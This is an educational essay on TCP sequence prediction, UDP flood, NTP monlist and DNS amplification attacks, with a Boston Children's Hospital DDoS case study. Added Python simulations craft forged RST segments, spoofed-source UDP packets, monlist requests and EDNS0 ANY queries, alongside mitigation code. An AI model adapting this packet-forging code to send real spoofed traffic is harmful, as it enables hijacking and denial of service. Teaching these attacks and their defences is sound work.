A Transmission Control Protocol (TCP) sequence prediction attack attempts to predict the sequence number that identifies the segments of a TCP connection, so that forged segments can be inserted into that connection (Luo & Yang, 2014).
How It Works
The attack relies on the attacker correctly guessing the sequence number a host will use when it sends. If that succeeds, the attacker can send the receiving host forged segments that appear to come from the trusted host, even though they actually originate from a third host under the attacker's control. The attack becomes possible when the attacker can observe the conversation between two trusted hosts and then emit segments that carry the same source IP address. By monitoring traffic before the attack, the malicious host works out the correct sequence number. Once the sequence number and IP address are known, it is a race between the trusted host and the attacker to get the next expected segment to the receiver first, which is why attackers commonly silence the trusted host with a Denial-of-Service attack at the same time. Once the attacker controls the connection, it can keep sending forged segments without any further help. An attacker who can deliver forged segments of this kind can cause considerable damage, including injecting data of their choosing into an existing TCP connection, or closing an existing connection prematurely by inserting forged segments with the RST bit set (Luo & Yang, 2014).
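The following Python example is added here to make the two halves of the attack concrete; it is not code from the original essay or from the cited paper. It models a host whose initial sequence numbers advance by a constant step (a constructed toy generator, not any real operating system), lets the attacker observe two ISNs and extrapolate the third, and then builds a forged TCP segment with the RST bit set and a checksum that the receiving stack will accept. The hosts 10.0.0.5 (trusted), 10.0.0.9 (victim) and the ports are assumptions made for the example.

```python
import socket
import struct

FLAG_SYN = 0x02
FLAG_RST = 0x04
FLAG_ACK = 0x10


def internet_checksum(data: bytes) -> int:
    """One's-complement Internet checksum (RFC 1071) over the given bytes."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


class LinearISN:
    """Toy initial-sequence-number generator that advances by a constant step
    per connection. Constructed for this example to model a predictable
    counter; it is not the generator of any particular operating system."""

    def __init__(self, seed: int, step: int = 64000):
        self.value = seed
        self.step = step

    def next_isn(self) -> int:
        self.value = (self.value + self.step) & 0xFFFFFFFF
        return self.value


def predict_next_isn(observed):
    """Attacker's side: infer the per-connection step from two observed ISNs
    and predict the ISN the host will use for its next connection."""
    step = (observed[-1] - observed[-2]) & 0xFFFFFFFF
    return (observed[-1] + step) & 0xFFFFFFFF


def build_tcp_segment(src_ip, dst_ip, sport, dport, seq, ack, flags, payload=b""):
    """Build a 20-byte TCP header (no options) plus payload, with the checksum
    computed over the IPv4 pseudo-header exactly as the receiver verifies it."""
    header = struct.pack("!HHIIBBHHH", sport, dport, seq, ack,
                         5 << 4,          # data offset: 5 words = 20 bytes, no options
                         flags, 65535, 0, 0)
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src_ip), socket.inet_aton(dst_ip),
                         0, socket.IPPROTO_TCP, len(header) + len(payload))
    csum = internet_checksum(pseudo + header + payload)
    header = header[:16] + struct.pack("!H", csum) + header[18:]
    return header + payload


def tcp_checksum_ok(src_ip, dst_ip, segment) -> bool:
    """A segment with a correct checksum sums to zero together with its pseudo-header."""
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src_ip), socket.inet_aton(dst_ip),
                         0, socket.IPPROTO_TCP, len(segment))
    return internet_checksum(pseudo + segment) == 0


def tcp_flags(segment) -> int:
    """Flags byte of a TCP header without options."""
    return segment[13]


def simulate_reset_injection(trusted_ip="10.0.0.5", victim_ip="10.0.0.9"):
    """Run the attack against the toy generator: observe two ISNs by sniffing,
    predict the third, then forge a RST that carries the predicted sequence
    number and the trusted host's source address. Addresses and ports are
    constructed for the example."""
    trusted_stack = LinearISN(seed=0x1000)
    observed = [trusted_stack.next_isn() for _ in range(2)]   # seen on the wire
    predicted = predict_next_isn(observed)
    actual = trusted_stack.next_isn()   # ISN the trusted host really uses next
    forged_rst = build_tcp_segment(trusted_ip, victim_ip, 40000, 22,
                                   predicted, 0, FLAG_RST)
    return {"observed": observed, "predicted": predicted, "actual": actual,
            "forged_rst": forged_rst}


if __name__ == "__main__":
    result = simulate_reset_injection()
    print("predicted %#x, actual %#x, hit=%s" % (
        result["predicted"], result["actual"], result["predicted"] == result["actual"]))
```

The checksum is bound to the spoofed source address through the pseudo-header, which is why the forged segment has to be built for the trusted host's address and not the attacker's own; the same `tcp_checksum_ok` check fails as soon as a different source address is assumed.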
UDP Flood Attack
A UDP flood attack is a Denial-of-Service (DoS) attack that uses the User Datagram Protocol (UDP), a connectionless transport protocol. Using UDP for denial of service is not as straightforward as using the Transmission Control Protocol (TCP). A UDP flood is started by sending large numbers of UDP packets to random ports on the remote host, which replies to each packet sent to a closed port with an ICMP Destination Unreachable message. A large number of UDP packets therefore forces the victim system to send many ICMP packets, until it becomes unreachable for other clients. The attacker can also spoof the source IP address of the UDP packets, so that the excessive ICMP replies never reach the attacker (Hussain & Beigh, 2013) and the attacker's real network location stays anonymous.
How It Works
A UDP flood attack exploits the steps a server takes when it responds to UDP packets sent to its ports. Normally, a server that receives a UDP packet on a given port goes through two steps. First, the server checks whether any running program is currently listening for requests on that port. Second, if no program is receiving packets on that port, the server responds with an ICMP Destination Unreachable (port unreachable) packet, which informs the sender that the destination cannot be reached (Hussain & Beigh, 2013).
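The example below is added to show those two steps in working code; it is not code from the essay or from the cited paper. It builds real IPv4/UDP packets, models a host that either delivers a datagram to a listener or answers with an ICMP Destination Unreachable message of type 3, code 3 (RFC 792: ICMP header plus the offending IP header and the first eight bytes of the datagram), and then floods that host with datagrams whose source address is spoofed, so that every ICMP error is addressed to the spoofed host rather than the attacker. The victim 203.0.113.10, the spoofed source 198.51.100.7 and the listening ports 53 and 123 are assumptions made for the example.

```python
import socket
import struct

IPPROTO_UDP = 17
ICMP_DEST_UNREACH = 3      # ICMP type
ICMP_PORT_UNREACH = 3      # ICMP code


def internet_checksum(data: bytes) -> int:
    """One's-complement Internet checksum (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src_ip, dst_ip, proto, payload_len, ttl=64):
    """Minimal 20-byte IPv4 header with a valid header checksum."""
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, ttl, proto, 0,
                         socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return header[:10] + struct.pack("!H", internet_checksum(header)) + header[12:]


def build_udp_packet(src_ip, dst_ip, sport, dport, payload):
    """IPv4 packet carrying a UDP datagram (UDP checksum left at 0, which IPv4 permits)."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    return build_ipv4_header(src_ip, dst_ip, IPPROTO_UDP, len(udp)) + udp


def build_port_unreachable(offending_packet):
    """ICMP Destination Unreachable / Port Unreachable: 8-byte ICMP header followed
    by the offending IP header and the first 8 bytes of its payload (the whole UDP
    header), so the original sender can match the error to its datagram."""
    ihl = (offending_packet[0] & 0x0F) * 4
    quoted = offending_packet[:ihl + 8]
    icmp = struct.pack("!BBHI", ICMP_DEST_UNREACH, ICMP_PORT_UNREACH, 0, 0) + quoted
    return icmp[:2] + struct.pack("!H", internet_checksum(icmp)) + icmp[4:]


class UdpHost:
    """Models the two steps a host takes for an inbound UDP datagram: look for a
    listener on the destination port, otherwise answer with ICMP port unreachable."""

    def __init__(self, ip, listening_ports):
        self.ip = ip
        self.listening = set(listening_ports)
        self.delivered = 0
        self.icmp_replies = []          # (destination ip, icmp bytes)

    def receive(self, packet):
        ihl = (packet[0] & 0x0F) * 4
        src_ip = socket.inet_ntoa(packet[12:16])
        dport = struct.unpack("!H", packet[ihl + 2:ihl + 4])[0]
        if dport in self.listening:             # step 1: a program is listening
            self.delivered += 1
            return None
        reply = build_port_unreachable(packet)  # step 2: nobody listening, send ICMP
        self.icmp_replies.append((src_ip, reply))
        return reply


def simulate_udp_flood(n_packets, spoofed_src="198.51.100.7", victim_ip="203.0.113.10"):
    """Flood the victim with datagrams to closed ports from a spoofed source: every
    ICMP error goes to the spoofed host, never to the attacker. Constructed addresses."""
    victim = UdpHost(victim_ip, listening_ports={53, 123})
    for i in range(n_packets):
        dport = 1024 + (i * 7919) % 60000       # pseudo-random high ports, never 53 or 123
        pkt = build_udp_packet(spoofed_src, victim_ip, 40000 + i % 1000, dport, b"\x00" * 16)
        victim.receive(pkt)
    return {"icmp_sent": len(victim.icmp_replies), "delivered": victim.delivered,
            "icmp_targets": {dst for dst, _ in victim.icmp_replies},
            "sample_reply": victim.icmp_replies[0][1] if victim.icmp_replies else None}


if __name__ == "__main__":
    stats = simulate_udp_flood(500)
    print("ICMP replies: %d, all addressed to %s" % (stats["icmp_sent"], stats["icmp_targets"]))
```

Each 44-byte datagram to a closed port costs the victim a 36-byte ICMP reply plus the work of generating it, and because the source address was spoofed the backscatter lands on 198.51.100.7, which is the mechanism behind both the anonymity and the collateral damage the text describes.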
NTP Monlist
NTP supports a command called monlist. The monlist command is sent to an NTP server for monitoring purposes: it returns a list of up to 600 machines that have recently interacted with the NTP server. The response is far larger than the request that produced it, which makes an amplification attack possible (Hussain & Beigh, 2013).
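To put a number on that size difference, the following added example (not code from the essay or from the cited paper) builds the 8-byte NTP mode 7 monlist request, models a server that answers with its table of recent peers, and computes the bandwidth amplification factor. The mode 7 header layout is the real one, but the 72-byte entry size, the six-entries-per-packet limit, the zero-padded entry contents and the 10.x.y.z peer addresses are assumptions made for the example.

```python
import socket
import struct

# NTP mode 7 ("private") protocol constants used by monlist.
MODE_PRIVATE = 7
IMPL_XNTPD = 3
REQ_MON_GETLIST_1 = 42
MONLIST_MAX_ENTRIES = 600     # a server returns at most 600 recent peers
# Assumed layout constants for this example: one monlist entry is 72 bytes and
# one mode-7 response packet carries at most 6 of them.
ENTRY_SIZE = 72
ENTRIES_PER_PACKET = 6
HEADER_SIZE = 8


def build_monlist_request() -> bytes:
    """The 8-byte request (sent with the victim's source address in an attack):
    byte 0 = response bit 0, more bit 0, version 2, mode 7 -> 0x17; then
    auth/sequence, implementation, request code, and zeroed err/count, mbz/size."""
    byte0 = (2 << 3) | MODE_PRIVATE
    return struct.pack("!BBBBHH", byte0, 0, IMPL_XNTPD, REQ_MON_GETLIST_1, 0, 0)


def monlist_entry(peer_ip: str) -> bytes:
    """Simplified 72-byte entry: the peer address followed by zero padding where
    a real entry carries counters and timestamps (assumption for this example)."""
    return socket.inet_aton(peer_ip).ljust(ENTRY_SIZE, b"\x00")


def build_monlist_responses(recent_peers):
    """Server side: answer with the last 600 peers, six per packet, setting the
    'more' bit on every packet except the last and numbering them in sequence."""
    entries = recent_peers[-MONLIST_MAX_ENTRIES:]
    packets = []
    for seq, start in enumerate(range(0, len(entries), ENTRIES_PER_PACKET)):
        chunk = entries[start:start + ENTRIES_PER_PACKET]
        more = 1 if start + ENTRIES_PER_PACKET < len(entries) else 0
        byte0 = 0x80 | (more << 6) | (2 << 3) | MODE_PRIVATE   # response bit set
        err_count = (0 << 12) | len(chunk)                       # err:4 | count:12
        mbz_size = ENTRY_SIZE & 0x0FFF                           # mbz:4 | size:12
        header = struct.pack("!BBBBHH", byte0, seq, IMPL_XNTPD, REQ_MON_GETLIST_1,
                             err_count, mbz_size)
        packets.append(header + b"".join(monlist_entry(p) for p in chunk))
    return packets


def parse_monlist_response(packet):
    """Client side: pull sequence, 'more' flag and peer addresses out of one packet."""
    byte0, seq, _impl, _code, err_count, mbz_size = struct.unpack("!BBBBHH", packet[:HEADER_SIZE])
    count, size = err_count & 0x0FFF, mbz_size & 0x0FFF
    peers = [socket.inet_ntoa(packet[HEADER_SIZE + i * size:HEADER_SIZE + i * size + 4])
             for i in range(count)]
    return {"seq": seq, "more": bool(byte0 & 0x40), "peers": peers}


def amplification_factor(request: bytes, responses) -> float:
    """Bytes delivered to the victim per byte the attacker sent."""
    return sum(len(p) for p in responses) / len(request)


def simulate_monlist(n_peers: int):
    """Constructed monitor table of n_peers hosts, queried once with the 8-byte request."""
    peers = ["10.%d.%d.%d" % ((i >> 16) & 0xFF, (i >> 8) & 0xFF, i & 0xFF) for i in range(n_peers)]
    request = build_monlist_request()
    responses = build_monlist_responses(peers)
    return {"request_len": len(request), "packets": len(responses),
            "response_bytes": sum(len(p) for p in responses),
            "amplification": amplification_factor(request, responses),
            "responses": responses}


if __name__ == "__main__":
    s = simulate_monlist(600)
    print("%d-byte request -> %d packets, %d bytes, x%.0f" % (
        s["request_len"], s["packets"], s["response_bytes"], s["amplification"]))
```

With a full table the single 8-byte request yields 100 packets of 440 bytes under these assumptions, so at the payload level the server sends the victim 5,500 bytes for every byte the attacker spent; the ratio is lower on the wire once IP and UDP headers are counted, but the direction of the imbalance is the whole point of the attack.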
DNS DDoS Attack
DNS amplification is a Distributed Denial of Service (DDoS) attack in which an attacker abuses publicly accessible domain name system (DNS) servers, turning small queries into much larger payloads that are directed at the victim's servers. The attack manipulates publicly accessible DNS servers so that the target is flooded with large UDP packets. During a DNS amplification attack the perpetrators send DNS queries to open DNS resolvers with the source IP address forged to be the victim's address, so the resolvers' large responses are delivered to the victim instead of the attacker (Hussain & Beigh, 2013).
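The following added example (not code from the essay or from the cited paper) shows how the small query becomes a large response. It builds a real DNS query for QTYPE ANY with an EDNS0 OPT record that advertises a 4096-byte UDP buffer, parses that query the way a resolver would, and answers with as many TXT records as fit into the advertised buffer, setting the TC bit when they do not. The zone example.test and its fifteen 200-byte TXT records are constructed for the example; the forged source address is implied by the attack and not represented in the DNS message itself.

```python
import struct

TYPE_TXT, TYPE_OPT, TYPE_ANY = 16, 41, 255
CLASS_IN = 1
FLAG_QR, FLAG_TC = 0x8000, 0x0200


def encode_name(name: str) -> bytes:
    """Wire-format domain name: length-prefixed labels, terminated by a zero byte."""
    if not name or name == ".":
        return b"\x00"
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(label)]) + label.encode("ascii") for label in labels) + b"\x00"


def decode_name(data: bytes, off: int):
    """Decode a name starting at offset off; returns (name, offset after the name)."""
    labels = []
    while True:
        ln = data[off]
        if ln == 0:
            return ".".join(labels), off + 1
        if ln & 0xC0 == 0xC0:                       # compression pointer (RFC 1035 4.1.4)
            ptr = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            labels.append(decode_name(data, ptr)[0])
            return ".".join(labels), off + 2
        labels.append(data[off + 1:off + 1 + ln].decode("ascii"))
        off += 1 + ln


def build_any_query(qname: str, txid: int = 0x1234, udp_payload_size: int = 4096) -> bytes:
    """Attacker's query: QTYPE ANY (largest possible answer) plus an EDNS0 OPT
    record advertising a large UDP buffer so the resolver need not truncate at 512."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 1)   # RD=1, 1 question, 1 additional
    question = encode_name(qname) + struct.pack("!HH", TYPE_ANY, CLASS_IN)
    opt = encode_name(".") + struct.pack("!HHIH", TYPE_OPT, udp_payload_size, 0, 0)
    return header + question + opt


def parse_query(q: bytes):
    """Resolver side: read the question and the EDNS0 buffer size, default 512."""
    txid, _flags, _qd, _an, _ns, ar = struct.unpack("!HHHHHH", q[:12])
    qname, off = decode_name(q, 12)
    qtype, _qclass = struct.unpack("!HH", q[off:off + 4])
    off += 4
    udp_size = 512
    for _ in range(ar):
        _, off = decode_name(q, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", q[off:off + 10])
        if rtype == TYPE_OPT:
            udp_size = rclass               # OPT reuses the CLASS field for the buffer size
        off += 10 + rdlen
    return {"id": txid, "qname": qname, "qtype": qtype, "udp_size": udp_size}


def build_response(query: bytes, txt_records) -> bytes:
    """Answer with as many TXT records as fit in the client's advertised buffer;
    if they do not all fit, set TC so a genuine client would retry over TCP."""
    info = parse_query(query)
    question = encode_name(info["qname"]) + struct.pack("!HH", info["qtype"], CLASS_IN)
    answers, count, truncated = b"", 0, False
    for txt in txt_records:
        rdata = bytes([len(txt)]) + txt                 # one <character-string>, at most 255 bytes
        rr = b"\xc0\x0c" + struct.pack("!HHIH", TYPE_TXT, CLASS_IN, 300, len(rdata)) + rdata
        if 12 + len(question) + len(answers) + len(rr) > info["udp_size"]:
            truncated = True
            break
        answers += rr
        count += 1
    flags = FLAG_QR | 0x0180 | (FLAG_TC if truncated else 0)   # RD and RA set
    header = struct.pack("!HHHHHH", info["id"], flags, 1, count, 0, 0)
    return header + question + answers


def is_truncated(response: bytes) -> bool:
    return bool(struct.unpack("!H", response[2:4])[0] & FLAG_TC)


def amplification_demo(zone_txt_records, udp_payload_size):
    """One spoofed query against a constructed zone; returns what the victim receives."""
    query = build_any_query("example.test.", udp_payload_size=udp_payload_size)
    response = build_response(query, zone_txt_records)
    return {"query_len": len(query), "response_len": len(response),
            "factor": len(response) / len(query), "truncated": is_truncated(response)}


if __name__ == "__main__":
    zone = [b"A" * 200] * 15
    for size in (512, 4096):
        print(size, amplification_demo(zone, size))
```

The same 41-byte query produces a 456-byte truncated answer when the client is assumed to have a 512-byte buffer, and a 3,225-byte answer when the OPT record advertises 4096 bytes, which is why amplification attacks always carry EDNS0 and ask for record types with large answers.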
Mitigation Strategies
Many operating systems limit the rate at which they send ICMP responses, which disrupts DDoS attacks that depend on ICMP replies. This is a significant strategy for mitigating UDP flood attacks. A substantial limitation of this kind of mitigation is that, while an attack is in progress, legitimate packets may be filtered along with the malicious ones. Cloudflare also mitigates UDP flood attacks by dropping all UDP traffic that is not related to DNS at the network edge.
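The example below is added to show both sides of that trade-off and is not code from the essay. It replays a constructed trace (a 5,000-packet flood to closed ports spread over one second, plus one legitimate DNS query and one legitimate probe to a closed port arriving during the flood) through a host that answers closed ports with ICMP, first with no limit, then behind an integer token-bucket ICMP rate limiter, and finally behind an edge rule that drops every inbound UDP datagram not destined for port 53. The bucket parameters (100 replies per second, burst of 10), the addresses and the edge rule are assumptions made for the example; they are not the defaults of any particular operating system or provider.

```python
from collections import namedtuple

# One inbound UDP datagram in a constructed trace: arrival time in microseconds,
# source address, destination port, and whether it is legitimate traffic.
Datagram = namedtuple("Datagram", "t_us src dport legit")

VICTIM_LISTENING = {53}          # the victim only serves DNS over UDP (assumption)
FLOOD_SRC = "198.51.100.7"       # spoofed source used by the flood (constructed)


class TokenBucket:
    """Integer token bucket: `rate` tokens per second, at most `burst` stored.
    Tokens are tracked in thousandths so the arithmetic stays exact."""

    def __init__(self, rate: int, burst: int):
        self.rate = rate
        self.capacity = burst * 1000
        self.tokens = self.capacity
        self.last_us = 0

    def allow(self, now_us: int) -> bool:
        refill = (now_us - self.last_us) * self.rate // 1000   # rate/1000 millitokens per microsecond
        self.tokens = min(self.capacity, self.tokens + refill)
        self.last_us = now_us
        if self.tokens >= 1000:
            self.tokens -= 1000
            return True
        return False


def build_trace(flood_packets: int, flood_duration_us: int):
    """Constructed trace: a flood to closed ports spread evenly over the duration,
    plus a real DNS client and a real client probing a closed port mid-flood
    (the kind of probe that relies on the ICMP reply to learn the port is closed)."""
    trace = [Datagram(i * flood_duration_us // flood_packets, FLOOD_SRC, 1024 + i % 60000, False)
             for i in range(flood_packets)]
    trace.append(Datagram(370_000, "192.0.2.1", 53, True))      # legitimate DNS query
    trace.append(Datagram(370_000, "192.0.2.2", 9999, True))    # legitimate probe of a closed port
    return trace


def respond(trace, limiter=None):
    """Victim's handling: deliver datagrams that have a listener, answer the rest
    with ICMP port unreachable unless the optional ICMP rate limiter says no."""
    stats = {"delivered": 0, "icmp_sent": 0, "icmp_suppressed": 0, "legit_icmp_suppressed": 0}
    for d in sorted(trace, key=lambda d: d.t_us):   # stable sort: flood packets precede the probe at equal times
        if d.dport in VICTIM_LISTENING:
            stats["delivered"] += 1
        elif limiter is None or limiter.allow(d.t_us):
            stats["icmp_sent"] += 1
        else:
            stats["icmp_suppressed"] += 1
            if d.legit:
                stats["legit_icmp_suppressed"] += 1
    return stats


def edge_filter(trace, allowed_ports=(53,)):
    """Edge mitigation of the kind the text attributes to Cloudflare: drop all inbound
    UDP that is not DNS before it reaches the victim (assumed rule for this example)."""
    return [d for d in trace if d.dport in allowed_ports]


if __name__ == "__main__":
    trace = build_trace(5000, 1_000_000)
    print("no limit:   ", respond(trace))
    print("rate limit: ", respond(trace, TokenBucket(rate=100, burst=10)))
    print("edge filter:", respond(edge_filter(trace)))
```

Unlimited, the host emits 5,001 ICMP messages for 5,001 datagrams; rate limited, it emits 109 and stays responsive, but the one legitimate probe is among the suppressed replies, which is exactly the collateral loss the text warns about. The edge rule removes the flood entirely, at the price that the legitimate non-DNS probe never reaches the host at all, so it suits a victim that exposes nothing but DNS over UDP.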
The conventional approaches to mitigating the impact of DNS amplification attacks include hardening DNS server security, rate limiting, and restricting recursion to particular DNS servers and clients. These mitigation methods are not entirely successful: they do not reduce the network load, and they do not remove the traffic that passes between open recursive resolvers and name servers.
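The example below is added to show two of those measures in working form; it is not code from the essay or from any DNS server. It models a server that serves its own zone to anyone but only recurses for clients inside an allowed network (so it is not an open resolver), and that applies response rate limiting per (apparent client, query name) with periodic truncated "slip" responses, the behaviour a real client survives by retrying over TCP while a spoofed victim receives almost nothing. The zone corp.test, the allowed network 10.0.0.0/8, the limit of five responses per second and the slip ratio are assumptions made for the example.

```python
import ipaddress
from collections import defaultdict


class Resolver:
    """Constructed model of a DNS server with recursion restricted to authorised
    client networks and per-(client, name) response rate limiting (RRL)."""

    def __init__(self, local_zones, recursion_allowed_from, rrl_limit, rrl_slip=2):
        self.local_zones = tuple(z.rstrip(".").lower() for z in local_zones)
        self.allowed = [ipaddress.ip_network(n) for n in recursion_allowed_from]
        self.rrl_limit = rrl_limit      # full responses per (client, name) per second
        self.rrl_slip = rrl_slip        # every Nth excess response is a truncated 'slip'; 0 = drop all
        self.counts = defaultdict(int)
        self.window = None

    def _recursion_allowed(self, src_ip: str) -> bool:
        ip = ipaddress.ip_address(src_ip)
        return any(ip in net for net in self.allowed)

    def _is_authoritative_for(self, qname: str) -> bool:
        name = qname.rstrip(".").lower()
        return any(name == z or name.endswith("." + z) for z in self.local_zones)

    def handle(self, src_ip: str, qname: str, now_s: float) -> str:
        """Return the server's decision for one query: ANSWER, REFUSED, SLIP or DROP."""
        if not self._is_authoritative_for(qname) and not self._recursion_allowed(src_ip):
            return "REFUSED"            # no recursion for unknown clients: not an open resolver
        # RRL over fixed one-second windows, keyed by the (possibly forged) source and the name.
        window = int(now_s)
        if window != self.window:
            self.counts.clear()
            self.window = window
        key = (src_ip, qname.rstrip(".").lower())
        self.counts[key] += 1
        excess = self.counts[key] - self.rrl_limit
        if excess <= 0:
            return "ANSWER"
        if self.rrl_slip and excess % self.rrl_slip == 0:
            return "SLIP"               # minimal TC=1 reply: real clients retry over TCP
        return "DROP"


def simulate_reflection(resolver, src_ip, qname, queries_per_second, seconds=1):
    """Queries carrying src_ip as source (forged, in an attack), spread evenly in time."""
    decisions = defaultdict(int)
    for i in range(queries_per_second * seconds):
        decisions[resolver.handle(src_ip, qname, i / queries_per_second)] += 1
    return dict(decisions)


if __name__ == "__main__":
    r = Resolver(["corp.test."], ["10.0.0.0/8"], rrl_limit=5, rrl_slip=2)
    print("spoofed victim, foreign name:", simulate_reflection(r, "203.0.113.10", "example.test.", 1000))
    print("spoofed victim, own zone:    ", simulate_reflection(r, "203.0.113.10", "corp.test.", 1000))
```

Closing recursion stops the victim's address from being used to fetch arbitrary large answers, but the server must still answer for its own zone, and that is where RRL takes over: of 1,000 spoofed queries per second for corp.test only five full answers reach the victim. The remaining queries still consume the server's inbound bandwidth, which is the residual cost the text refers to.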
A TCP sequence prediction attack is mitigated by increasing the randomness of the initial sequence numbers a host generates, which makes them resistant to the monitoring and predictive analysis that would otherwise give cybercriminals easy access to the next sequence number. A more effective strategy is to filter source-routed packets and packets that arrive from outside the network with a source address that belongs inside it. Services that rely on IP-address-based authentication should refuse connections entirely when they detect the presence of source-routing options.
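The following example is added to show those three mitigations in code; it is not from the essay. It implements initial sequence numbers in the form RFC 6528 describes, ISN = M + F(localip, localport, remoteip, remoteport, secret) with M a clock ticking every 4 microseconds, lets an attacker observe the ISNs of its own connections and extrapolate, and then applies the border filter and the refusal of source-routed connections from the last two sentences. RFC 6528 specifies MD5 for F; this example substitutes an HMAC-SHA256 truncated to 32 bits, which is an assumption of the example, as are the addresses, ports, secret and the 10.0.0.0/8 internal network.

```python
import hashlib
import hmac
import ipaddress
import os
import socket
import struct


class Rfc6528ISN:
    """ISN = M + F(localip, localport, remoteip, remoteport, secret), with M a
    4-microsecond clock. F here is HMAC-SHA256 truncated to 32 bits (assumption);
    RFC 6528 itself names MD5."""

    def __init__(self, secret: bytes = None):
        self.secret = secret if secret is not None else os.urandom(16)

    def isn(self, local_ip, local_port, remote_ip, remote_port, now_us: int) -> int:
        m = (now_us // 4) & 0xFFFFFFFF
        conn = struct.pack("!4sH4sH", socket.inet_aton(local_ip), local_port,
                           socket.inet_aton(remote_ip), remote_port)
        f = int.from_bytes(hmac.new(self.secret, conn, hashlib.sha256).digest()[:4], "big")
        return (m + f) & 0xFFFFFFFF


def predict_from_observed(observed):
    """The attacker's linear guess: next ISN = last ISN + the last observed step."""
    step = (observed[-1] - observed[-2]) & 0xFFFFFFFF
    return (observed[-1] + step) & 0xFFFFFFFF


def prediction_attempt(gen, victim_ip="10.0.0.9", attacker_ip="10.0.0.66", trusted_ip="10.0.0.5"):
    """Attacker opens two connections of its own to the victim, observes the ISNs it
    is given, extrapolates, and compares with the ISN the victim will hand the
    trusted host. The per-connection term F differs for every 4-tuple, so the
    observed values say nothing about the trusted host's ISN. Constructed addresses."""
    t = 1_000_000
    observed = [gen.isn(victim_ip, 22, attacker_ip, 40000, t),
                gen.isn(victim_ip, 22, attacker_ip, 40001, t + 4000)]
    predicted = predict_from_observed(observed)
    actual = gen.isn(victim_ip, 22, trusted_ip, 40002, t + 8000)
    return predicted, actual


def ingress_decision(src_ip: str, arrived_on_external: bool, source_routed: bool, internal_nets):
    """Border-router policy from the text: drop source-routed packets, and drop packets
    arriving on the external interface whose source claims to be inside the network."""
    if source_routed:
        return "drop: source-routed"
    if arrived_on_external and any(ipaddress.ip_address(src_ip) in ipaddress.ip_network(n)
                                   for n in internal_nets):
        return "drop: internal source on external interface"
    return "accept"


def ip_authenticated_connect(src_ip: str, source_routed: bool, trusted_hosts) -> bool:
    """A service that trusts clients by IP address refuses the connection outright
    when the packet carries source-routing options, even from a trusted address."""
    return src_ip in trusted_hosts and not source_routed


if __name__ == "__main__":
    gen = Rfc6528ISN()
    predicted, actual = prediction_attempt(gen)
    print("predicted %#x, actual %#x, hit=%s" % (predicted, actual, predicted == actual))
    print(ingress_decision("10.0.0.5", True, False, ["10.0.0.0/8"]))
```

The secret-keyed term keeps ISNs monotonic for one connection (so old segments are still rejected) while making the ISNs of different connections unrelated, and the two filters address the remaining step of the attack: even a correctly guessed sequence number is useless if the spoofed segment is dropped at the border or the service refuses to treat a source-routed packet as coming from a trusted address.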
Summary of Events at Boston Children Case Study
In 2014, Boston Children's Hospital became the first healthcare organization to be targeted by DDoS attacks from hackers. Because the hospital shared an Internet Service Provider (ISP) with seven other healthcare organizations, the planned DDoS attacks could potentially have degraded much of Boston's critical healthcare infrastructure. The offensive began with a threat and included three significant strikes. The first was pre-strike doxing related to a high-profile custody case involving a 15-year-old girl with a complicated diagnosis who was under the protective services of Massachusetts. The second was the DDoS strike itself, which began in April 2014 when the attackers carried out their threats and targeted the hospital's external website. The multidisciplinary team assembled to mitigate the attacks identified three crucial issues: the inability to route electronic prescriptions to pharmacies, downtime for departmental email, and the loss of access to external electronic health records. To mitigate the DDoS attacks, Boston Children's Hospital used Radware's scrubbing center (McGee, 2014).
References
Hussain, S. M., & Beigh, G. R. (2013). Impact of DDoS attack (UDP Flooding) on queuing models. 2013 4th International Conference on Computer and Communication Technology (ICCCT). doi:10.1109/iccct.2013.6749629
Luo, J., & Yang, X. (2014). The NewShrew attack: A new type of low-rate TCP-Targeted DoS attack. 2014 IEEE International Conference on Communications (ICC). doi:10.1109/icc.2014.6883403
McGee, M. K. (2014, April 25). DDoS Assault on Boston Hospital [Web log post]. Retrieved from https://www.databreachtoday.com/boston-hospital-under-ddos-assault-a-6790